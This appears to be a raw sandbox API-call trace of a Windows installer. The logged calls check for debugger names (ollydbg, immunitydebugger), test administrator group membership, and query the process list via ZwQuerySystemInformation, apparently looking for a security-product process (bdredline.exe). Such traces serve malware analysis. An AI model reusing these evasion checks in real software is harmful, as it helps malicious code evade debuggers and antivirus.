[0158.103] strstr (_Str="0", _SubStr="ollydbg") returned 0x0 [0158.103] strstr (_Str="0", _SubStr="immunitydebugger") returned 0x0 [0158.365] GetProcAddress (hModule=0x75700000, lpProcName="GetAccountType") returned 0x75701215 [0158.365] GetVersion () returned 0x1db10106 [0158.365] GetCurrentThread () returned 0xfffffffe [0158.365] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x18f7c4 | out: TokenHandle=0x18f7c4*=0x0) returned 0 [0158.365] GetCurrentProcess () returned 0xffffffff [0158.365] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f7c4 | out: TokenHandle=0x18f7c4*=0x190) returned 1 [0158.365] GetModuleHandleA (lpModuleName="ADVAPI32") returned 0x76650000 [0158.365] GetProcAddress (hModule=0x76650000, lpProcName="CheckTokenMembership") returned 0x7665df04 [0158.365] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x221, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.365] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x222, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.366] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x223, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.366] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.366] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] CloseHandle (hObject=0x190) returned 1 [0158.367] lstrcpynA (in: lpString1=0x33611c, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] FreeLibrary (hLibModule=0x75700000) returned 1 [0158.367] lstrcpynA (in: lpString1=0x432c00, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] lstrcpynA (in: lpString1=0x42e3a0, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] lstrlenA (lpString="User") returned 4 [0158.367] lstrcpynA (in: lpString1=0x40ac18, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] lstrcpynA (in: lpString1=0x40b018, lpString2="Admin", iMaxLength=1024 | out: lpString1="Admin") returned="Admin" [0158.367] lstrcmpiA (lpString1="User", lpString2="Admin") returned 1 [0158.367] lstrcpynA (in: lpString1=0x33611c, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.367] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.367] lstrlenA (lpString="") returned 0 [0158.367] lstrcpynA (in: lpString1=0x336564, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.367] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.367] lstrcpynA (in: lpString1=0x33611c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x336564, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.368] lstrcpynA (in: lpString1=0x430000, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.368] lstrlenA (lpString="384") returned 3 [0158.368] lstrcpynA (in: lpString1=0x336564, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x3369ac, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x336df4, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.368] lstrlenA (lpString="bdredline.exe") returned 13 [0158.368] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.369] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.369] lstrcpynA (in: lpString1=0x430400, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.369] lstrcpynA (in: lpString1=0x40a418, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrlenA (lpString="65536") returned 5 [0158.369] lstrcpynA (in: lpString1=0x430800, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrcpynA (in: lpString1=0x33835c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.369] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.369] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrlenA (lpString="65536") returned 5 [0158.369] lstrcpynA (in: lpString1=0x3387a4, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.369] lstrcpynA (in: lpString1=0x40a418, lpString2="Alloc", iMaxLength=1024 | out: lpString1="Alloc") returned="Alloc" [0158.370] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.370] GetProcAddress (hModule=0x75710000, lpProcName="Alloc") returned 0x75711000 [0158.370] wsprintfA (in: param_1=0x18f5a4, param_2="%d" | out: param_1="3297464") returned 7 [0158.370] lstrcpynA (in: lpString1=0x3387a4, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.370] lstrcpynA (in: lpString1=0x430c00, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.370] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.370] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.370] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.370] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.370] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.370] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.370] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.370] lstrcpynA (in: lpString1=0x42e3c7, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.370] lstrlenA (lpString="3297464") returned 7 [0158.370] lstrcpynA (in: lpString1=0x42e3d2, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.370] lstrlenA (lpString="65536") returned 5 [0158.371] lstrcpynA (in: lpString1=0x3387a4, lpString2="ntdll::ZwQuerySystemInformation(i 5, i 3297464, i 65536, i 0) i .r0", iMaxLength=1024 | out: lpString1="ntdll::ZwQuerySystemInformation(i 5, i 3297464, i 65536, i 0) i .r0") returned="ntdll::ZwQuerySystemInformation(i 5, i 3297464, i 65536, i 0) i .r0" [0158.371] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.371] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.371] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.371] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.371] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.371] lstrcpyA (in: lpString1=0x33f9d0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.371] lstrcpyA (in: lpString1=0x33e108, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.371] lstrcpyA (in: lpString1=0x33e508, lpString2="ZwQuerySystemInformation" | out: lpString1="ZwQuerySystemInformation") returned="ZwQuerySystemInformation" [0158.371] lstrcpynA (in: lpString1=0x33f5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="65536") returned 5 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3297464") returned 7 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="5") returned 1 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.372] lstrcpyA (in: lpString1=0x430000, lpString2="0" | out: lpString1="0") returned="0" [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.372] lstrlenA (lpString="0") returned 1 [0158.372] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.372] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.372] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.372] lstrlenA (lpString="3297464") returned 7 [0158.372] lstrcpynA (in: lpString1=0x40a418, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.372] lstrlenA (lpString="3297464") returned 7 [0158.372] lstrcpynA (in: lpString1=0x431c00, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.372] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.372] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.372] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.372] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.372] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.373] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.373] lstrlenA (lpString="3297464") returned 7 [0158.373] lstrcpynA (in: lpString1=0x3387a4, lpString2="*3297464(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)", iMaxLength=1024 | out: lpString1="*3297464(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)") returned="*3297464(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)" [0158.373] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.373] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.373] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.373] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.373] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.373] lstrcpyA (in: lpString1=0x33e508, lpString2="3297464" | out: lpString1="3297464") returned="3297464" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] lstrcpyA (in: lpString1=0x430800, lpString2="0" | out: lpString1="0") returned="0" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="248") returned 3 [0158.374] lstrcpyA (in: lpString1=0x431000, lpString2="248" | out: lpString1="248") returned="248" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3297464") returned 7 [0158.374] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.375] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.375] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.375] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.375] lstrcpynA (in: lpString1=0x3387a4, lpString2="kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0", iMaxLength=1024 | out: lpString1="kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0") returned="kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0" [0158.375] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 